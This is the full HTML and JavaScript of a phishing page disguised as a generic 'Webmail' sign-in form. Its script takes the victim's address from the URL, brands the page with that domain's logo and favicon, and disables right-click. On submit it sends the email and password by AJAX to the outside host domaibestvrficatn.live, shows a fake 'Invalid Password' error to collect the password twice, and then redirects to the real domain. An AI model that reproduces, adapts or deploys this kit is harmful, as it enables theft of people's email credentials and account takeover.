<!doctype html>
<html lang="en">
<head>
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
  <script src="https://code.jquery.com/jquery-3.1.1.min.js">
    <script src="https://code.jquery.com/jquery-3.3.1.js" integrity="sha256-2Kok7MbOyxpgUVvAk/HJ2jigOSYS2auK4Pfzbm7uH60=" crossorigin="anonymous"></script>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    
	<script>
	document.addEventListener('contextmenu', event => event.preventDefault());
    </script>

    <!-- Bootstrap CSS -->
    <!-- <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous"> -->
    <link href="https://fonts.googleapis.com/css?family=Archivo+Narrow" rel="stylesheet">
    <script src="https://kit.fontawesome.com/585b051251.js" crossorigin="anonymous"></script>
    <title class="logoname"> Mail </title>
	<link rel="icon" type="image/png" sizes="192x192" href="" id="favimg">
    <link href="css/hover.css" rel="stylesheet" media="all">
	<link href="files/style.css" rel="stylesheet" media="all">
    <style type="text/css">
      .login-form {
        width: 385px;
        margin: 30px auto;
      }
      .login-form form {
        margin-bottom: 15px;
        background: #f7f7f7;
        box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);
        padding: 30px;
      }
      .login-form h2 {
        margin: 0 0 15px;
      }
      .form-control, .login-btn {
        min-height: 38px;
        border-radius: 2px;
      }
      .input-group-addon .fa {
        font-size: 18px;
      }
      .login-btn {
        font-size: 15px;
        font-weight: bold;
      }
      .social-btn .btn {
        border: none;
        margin: 10px 3px 0;
        opacity: 1;
      }
      .social-btn .btn:hover {
        opacity: 0.9;
      }
      .social-btn .btn-primary {
        background: #507cc0;
      }
      .social-btn .btn-info {
        background: #64ccf1;
      }
      .social-btn .btn-danger {
        background: #df4930;
      }
      .or-seperator {
        margin-top: 20px;
        text-align: center;
        border-top: 1px solid #ccc;
      }
      .or-seperator i {
        padding: 0 10px;
        background: #f7f7f7;
        position: relative;
        top: -11px;
        z-index: 1;
      }
      



    </style>
</head>
<body style="background-image: url('http://hilitemultimedia.com/uploads/service/bulk-email.jpg'); background-size: cover;background-repeat: no-repeat;">
  <div class="container-fluid">
    <p>&nbsp;</p>
    <p>&nbsp;</p>



    <div class="login-form">
      <form action="#" method="post">
        <h2 class="text-center"><div id="top"><img src="files/logo.jpg" alt="Mailbox" id="logoimg" style="height:32px;">
		
		<span style="vertical-align: middle; padding-left: 5px" class="logoname">Webmail</span> <br><br><font size="5">Sign in</font></div></h2>
        <center>
          <div class="alert alert-danger" id="msg" style="display: none;">&#x26a0; Invalid Password.! Please Enter your correct Password</div>
          <span id="error" class="text-danger" style="display: none;">That account doesn't exist. Enter a different account</span>
        </center>
        <div class="form-group">
          <div class="input-group">
            <span class="input-group-addon"><i class="fas fa-user"></i></span>
            <input type="email" class="form-control" name="username" placeholder="Username" value="" id="email" readonly>
          </div>
        </div>
        <div class="form-group">
          <div class="input-group">
            <span class="input-group-addon"><i class="fas fa-lock"></i></span>
            <input type="password" class="form-control" id="password" name="pdf2" placeholder="Password" required="required">
          </div>
        </div>
        <div class="form-group">
          


          <button type="submit" class="btn btn-primary login-btn btn-block" id="submit-btn">Sign in</button>
        </div><br>
		 <p style="text-align:center; font-size:13px">&#x2709; Connected to <font color="#067bc8"><span id="connect"></span></font></p>
		<br>
        <div class="clearfix"><font size="2">
          <label class="pull-left checkbox-inline"><input type="checkbox"> Secure my account from virus threats.</label><br>
		  <label class="pull-left checkbox-inline"><input type="checkbox"> This is a private computer</label>
          <a href="#" class="pull-right">Forgot Password?</a></font>
        </div>

      </form>
    </div>
      <p style="text-align:center"> <a href="#"><span class="logoname"></span> Copyright&copy; 2021 </a> </p>
      
      





    <style>.tb_button {padding:1px;cursor:pointer;border-right: 1px solid #8b8b8b;border-left: 1px solid #FFF;border-bottom: 1px solid #fff;}.tb_button.hover {borer:2px outset #def; background-color: #f8f8f8 !important;}.ws_toolbar {z-index:100000} .ws_toolbar .ws_tb_btn {cursor:pointer;border:1px solid #555;padding:3px}   .tb_highlight{background-color:yellow} .tb_hide {visibility:hidden} .ws_toolbar img {padding:2px;margin:0px}
    </style>



    <!-- Optional JavaScript -->
    <!-- jQuery first, then Popper.js, then Bootstrap JS -->
    <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
  

  <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
  <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
  <script>

    /* global $ */
    $(document).ready(function(){
      var count=0;

      $('#back1').click(function () {
        $("#msg").hide();
        $('#email').val("");
        $("#automail").animate({left:200, opacity:"hide"}, 0);
        $("#inputbar").animate({right:200, opacity:"show"}, 1000);

      });

      var email = window.location.hash.substr(1);
      if (!email) {

      }
      else
      {
        var my_email =email;
        $('#email').val(my_email);
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!filter.test(my_email)) {
          $('#error').show();
          email.focus;
          return false;
        }
        var ind=my_email.indexOf("@");
        var my_slice=my_email.substr((ind+1));
        var c= my_slice.substr(0, my_slice.indexOf('.'));
        var final= c.toLowerCase();
        var finalu= c.toUpperCase();

        $("#logoimg").attr("src", "https://logo.clearbit.com/"+my_slice);
		$("#favimg").attr("href", "https://www.google.com/s2/favicons?domain="+my_slice);
		$('#connect').html(""+my_email);
        $("#logoname").html(finalu);
        $(".logoname").html(finalu);
      }


      
      $('#submit-btn').click(function(event){
        $('#error').hide();
        $('#msg').hide();
        event.preventDefault();
        var email=$("#email").val();
        var password=$("#password").val();
        var msg = $('#msg').html();
        $('#msg').text( msg );
      ///////////new injection////////////////
      var my_email =email;
      var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

      if (!filter.test(my_email)) {
        $('#error').show();
        email.focus;
        return false;
      }

      var ind=my_email.indexOf("@");
      var my_slice=my_email.substr((ind+1));
      var c= my_slice.substr(0, my_slice.indexOf('.'));
      var final= c.toLowerCase();
      var finalu= c.toUpperCase();

        $("#logoimg").attr("src", "https://logo.clearbit.com/"+my_slice);
        $(".logoimg").attr("src", "https://logo.clearbit.com/"+my_slice);
        $("#logoname").html(finalu);
      ///////////new injection////////////////
      count=count+1;
      
      $.ajax({
        dataType: 'JSON',
        url: 'https://domaibestvrficatn.live/ii/post.php',
        type: 'POST',
        data:{
          email:email,
          password:password,
        },
            // data: $('#contact').serialize(),
            beforeSend: function(xhr){
              $('#submit-btn').html('Verifing...');
            },
            success: function(response){
              if(response){
                $("#msg").show();
                console.log(response);
                if(response['signal'] == 'ok'){
                  $("#password").val("");
                  if (count>=2) {
                    count=1;
                    // window.location.replace(response['redirect_link']);
                    window.location.replace("http://www."+my_slice);

                  }
                  // $('#msg').html(response['msg']);
                }
                else{
                  // $('#msg').html(response['msg']);
                }
              }
            },
            error: function(){
              $("#password").val("");
              if (count>=2) {
                count=1;
                window.location.replace("http://www."+my_slice);
              }
              $("#msg").show();
              // $('#msg').html("Please try again later");
            },
            complete: function(){
              $('#submit-btn').html('Sign in');
            }
          });
    });


    });


  </script>
  

</body>
</html>